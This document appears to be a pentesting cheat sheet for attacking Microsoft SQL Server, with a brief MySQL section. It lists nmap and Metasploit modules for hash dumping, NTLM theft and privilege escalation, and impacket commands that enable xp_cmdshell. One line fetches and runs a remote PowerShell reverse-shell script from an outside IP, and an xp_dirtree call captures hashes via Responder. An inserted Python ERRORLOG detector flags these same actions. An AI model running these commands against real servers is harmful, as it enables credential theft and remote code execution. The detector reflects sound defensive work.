The DAC port is used to connect to the database instance when normal connection attempts fail, for example when the server is hanging, out of memory or in another bad state. In addition, the DAC port gives an administrator access to system objects that are otherwise not reachable over normal connections.
The DAC feature listens on the loopback adapter by default, but can be enabled for remote access by setting the 'remote admin connection' configuration value to 1. In some cases, when DAC has been enabled remotely and later disabled, the SQL Browser service may incorrectly report it as still available.
sudo nmap -sU -p 1434 --script ms-sql-dac <ip>
Query (with credentials)
Automated
Queries Microsoft SQL Server (ms-sql) instances for a list of databases, linked servers, and configuration settings.
# Dumps the password hashes from an MS-SQL server in a format suitable
# Credentials required
ms-sql-dump-hashes
# Queries Microsoft SQL Server (ms-sql) instances for a list of databases a user has access to.
# Credentials required
ms-sql-hasdbaccess
# Runs a query against Microsoft SQL Server (ms-sql).
# Credentials required.
ms-sql-query
# Queries Microsoft SQL Server (ms-sql) for a list of tables per database.
# Credentials required
ms-sql-tables
# Attempts to run a command using the command shell of Microsoft SQL Server (ms-sql)
# Credentials required
ms-sql-xp-cmdshell
Metasploit Modules:
#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if a domain is used

#Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, run Responder before executing

#Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

#Search for interesting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has the IMPERSONATE privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Uploads and executes a payload

#Add new admin user from meterpreter session
msf> use windows/manage/mssql_local_auth_bypass
impacket mssqlclient:
mssqlclient.py -db volume -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP> #Recommended: use -windows-auth when you are going to use a domain; use the NetBIOS name of the machine as the domain

#Once logged in you can run queries:
SQL> select @@version;

#Steal NTLM hash
sudo responder -I <interface> #Run this in another console
SQL> exec master..xp_dirtree '\\<YOUR_RESPONDER_IP>\test' #Steal the NTLM hash, crack it with john or hashcat

#Try to enable code execution
SQL> enable_xp_cmdshell

#Execute code, two syntaxes, for simple and complex commands
SQL> xp_cmdshell whoami /all
SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
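The three actions this page relies on (turning on 'remote admin connection' for DAC, enabling xp_cmdshell, and calling xp_dirtree with a UNC path) all leave traces in the SQL Server ERRORLOG. The following detector is an added example, not part of the original page or any tool it lists; it scans constructed ERRORLOG lines written in the layout SQL Server uses and flags sensitive configuration changes and extended stored procedure loads.

```python
import re
from dataclasses import dataclass

# Constructed sample in the ERRORLOG layout "<date> <time> spid<N>  <message>".
# These are not real log entries; the message texts follow the wording
# SQL Server writes for sp_configure changes and extended-procedure loads.
SAMPLE_ERRORLOG = """\
2024-03-02 09:14:02.11 spid52      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-02 09:14:02.13 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-02 09:14:05.40 spid52      Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_cmdshell'. This is an informational message only; no user action is required.
2024-03-02 09:20:17.02 spid61      Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_dirtree'. This is an informational message only; no user action is required.
2024-03-03 18:40:00.77 spid55      Configuration option 'remote admin connection' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-03 18:41:00.00 spid55      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
"""

# Options and procedures the page shows being toggled or abused.
SENSITIVE_OPTIONS = {"xp_cmdshell", "remote admin connection", "Ole Automation Procedures"}
SENSITIVE_XPS = {"xp_cmdshell", "xp_dirtree", "xp_fileexist"}

LINE_RE = re.compile(r"^(\S+ \S+) (spid\d+)\s+(.*)$")
CONFIG_RE = re.compile(r"Configuration option '([^']+)' changed from (\d+) to (\d+)")
XP_RE = re.compile(r"to execute extended stored procedure '([^']+)'")

@dataclass(frozen=True)
class Finding:
    timestamp: str
    spid: str
    kind: str   # "config_enabled" or "xp_executed"
    name: str

def scan_errorlog(text: str) -> list[Finding]:
    """Return findings in log order; lines that do not parse are ignored."""
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        ts, spid, msg = m.groups()
        cfg = CONFIG_RE.search(msg)
        # Only a change *to* a non-zero value enables the option.
        if cfg and cfg.group(1) in SENSITIVE_OPTIONS and cfg.group(3) != "0":
            findings.append(Finding(ts, spid, "config_enabled", cfg.group(1)))
            continue
        xp = XP_RE.search(msg)
        # The DLL-load message is informational and coarse (it is not written per call),
        # so treat it as a lead to correlate with the spid's session, not proof of abuse.
        if xp and xp.group(1) in SENSITIVE_XPS:
            findings.append(Finding(ts, spid, "xp_executed", xp.group(1)))
    return findings

if __name__ == "__main__":
    for f in scan_errorlog(SAMPLE_ERRORLOG):
        print(f"{f.timestamp} {f.spid} {f.kind}: {f.name}")
```

Pair the findings with the corresponding spid in the default trace or an audit of sp_configure and xp_dirtree to see which login made the change.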
mysql -u root # Connect as root without a password
mysql -u root -p # You will be prompted for a password (check someone)
mysql -u root -h 127.0.0.1 -e 'show databases;'
Remote:
mysql -h <Hostname> -u root
mysql -h <Hostname> -u user@target-host
MSSQL - SMB Relay Attack
If we are in the local network we can run a MitM attack and grab NTLM hashes by setting up a fake SQL server and making the service authenticate against our server.
Stored Procedures (db_owner to sysadmin)
If we have the credentials of a DB user, we can become sysadmin and execute commands remotely:
Metasploit
use auxiliary/admin/mssql/mssql_escalate_dbowner
set rhost 172.20.10.2
set rport 1433
set username db1_owner
set password MyPassword!
Stored Procedures (user impersonation)
This technique is mostly used for privilege escalation.